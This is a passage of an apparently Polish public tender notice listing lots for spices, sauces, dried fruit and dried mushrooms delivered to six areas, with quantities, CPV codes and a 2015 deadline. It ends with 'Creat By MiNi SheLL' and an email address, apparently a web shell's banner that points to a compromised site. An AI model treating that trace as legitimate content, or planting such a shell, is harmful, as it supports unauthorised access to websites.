32	Szałwia 2 kg, 
33	Koperek suszony	8 kg, 
34	Natka pietruszki suszona 4 kg, 
35	Kolendra 6 kg, 
36	Sos do sałatek 4 kg, 
37	Zioła prowansalskie  2 kg
38	Drożdże 2 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.73-8, 15.87.12.50-1, 15.87.12.30-5, 15.87.12.70-7, 15.87.11.20-1, 15.89.00.00-3, 15.89.15.00-5, 15.87.00.00-7, 15.89.80.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa przypraw przetworzonych, sosów zup do obszaru V..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa przypraw przetworzonych, sosów zup tj:
1	Sos grzybowy 20 kg, 
2	Sos myśliwski 20 kg,
3	Sos boloński 20 kg,
4	Barszcz czerwony - instant	300 kg, 
5	Żurek	400 kg, 
6	Majonez jednoporcjowy	400 kg, 
7	Majonez 100 kg, 
8	Musztarda jednoporcjowa 1 200 kg, 
9	Musztarda	150 kg, 
10	Ketchup jednoporcjowy	1 100 kg, 
11	Ketchup	100 kg, 
12	Przyprawa do mięsa 40 kg, 
13	Przyprawa do ryb	30 kg, 
14	Przyprawa do drobiu	30 kg, 
15	Przyprawa uniwersalna	30 kg, 
16	Ocet	300 l, 
17	Kwasek cytrynowy 1kg, 
18	Cynamon	10 kg, 
19	Bulion drobiowy	400 kg, 
20	Rosół wołowy	200 kg, 
21	Bazylia	6 kg, 
22	Oregano 3 kg, 
23	Przyprawa do zup w płynie	800 kg, 
24	Koncentrat pomidorowy	400 kg, 
25	Liśc laurowy 10 kg, 
26	Majeranek	15 kg, 
27	Ziele angielskie	12 kg, 
28	Rozmarym	5 kg, 
29	Czosnek	10 kg, 
30	Papryka chili 10 kg, 
31	Carry	10 kg, 
32	Szałwia 2 kg, 
33	Koperek suszony	5 kg, 
34	Natka pietruszki suszona 5 kg, 
35	Kolendra	5 kg, 
36	Sos do sałatek 10 kg, 
37	Zioła prowansalskie 10 kg,
38	Drożdże 1 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.73-8, 15.87.12.50-1, 15.87.12.30-5, 15.87.12.70-7, 15.87.11.20-1, 15.89.00.00-3, 15.89.15.00-5, 15.87.00.00-7, 15.89.80.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa przypraw przetworzonych, sosów zup do obszaru VI..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa przypraw przetworzonych, sosów zup tj:
1	Sos grzybowy	55 kg, 
2	Sos myśliwski	65 kg, 
3	Sos boloński	40 kg, 
4	Barszcz czerwony - instant	195 kg, 
5	Żurek	230 kg, 
6	Majonez jednoporcjowy	260 kg, 
7	Majonez	200 kg, 
8	Musztarda jednoporcjowa 460 kg, 
9	Musztarda	80 kg, 
10	Ketchup jednoporcjowy	430 kg, 
11	Ketchup	80 kg, 
12	Przyprawa do mięsa 140 kg, 
13	Przyprawa do ryb	36 kg, 
14	Przyprawa do drobiu 75 kg, 
15	Przyprawa uniwersalna	240 kg, 
16	Ocet	240 l, 
17	Kwasek cytrynowy 36 kg, 
18	Cynamon	7 kg, 
19	Bulion drobiowy	120 kg, 
20	Rosół wołowy 140 kg, 
21	Bazylia 13 kg, 
22	Oregano 3 kg, 
23	Żelatyna spożywcza 15 kg, 
24	Przyprawa do zup w płynie 610 kg, 
25	Koncentrat pomidorowy	650 kg, 
26	Liśc laurowy 25 kg, 
27	Majeranek	46 kg, 
28	Ziele angielskie 48 kg, 
29	Rozmarym	11 kg, 
30	Czosnek	161 kg, 
31	Papryka chili 12 kg, 
32	Carry 11 kg, 
33	Szałwia 11 kg, 
34	Koperek suszony	11 kg, 
35	Natka pietruszki suszona 11 kg, 
36	Kolendra 11kg, 
37	Sos do sałatek 51 kg, 
38	Zioła prowansalskie 12kg,
39	Drożdże 11kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.73-8, 15.87.12.50-1, 15.87.12.30-5, 15.87.12.70-7, 15.87.11.20-1, 15.89.00.00-3, 15.89.15.00-5, 15.87.00.00-7, 15.89.80.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa owoców suszonych do obszaru I..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa owoców suszonych tj:
1	Jabłka suszone	100 kg,
2	Śliwki suszone	100 kg,
3	Morele suszone	100 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa owoców suszonych do obszaru II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa owoców suszonych tj: 
Śliwki suszone	8 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa owoców suszonych do obszaru III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa owoców suszonych, tj: 
1	Jabłka suszone	1 kg,
2	Śliwki suszone	6 kg,
3	Morele suszone	2 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa owoców suszonych do obszaru IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa owoców suszonych tj:
1. Śliwki suszone - 100 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostawa owoców suszonych do obszaru V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa owoców suszonych tj:
1	Jabłka suszone	10 kg, 
2	Śliwki suszone	10 kg,
3	Morele suszone	10 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Dostawa owoców suszonych do obszaru VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa owoców suszonych tj:
1 Jabłka suszone	2 kg,
2 Śliwki suszone	2 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Dostawa grzybów suszonych do obszaru I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa grzybów suszonych w ilości 30 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Dostawa grzybów suszonych do obszaru II..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa grzybów suszonych w ilości 20 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Dostawa grzybów suszonych do obszaru III..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa grzybów suszonych w ilości 4 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Dostawa grzybów suszonych do obszaru IV..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa grzybów suszonych w ilości 80 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Dostawa grzybów suszonych do obszaru V..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostaw grzybów suszonych w ilości 20 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Dostawa grzybów suszonych do obszaru VI..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa grzybów suszonych w ilości 20 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com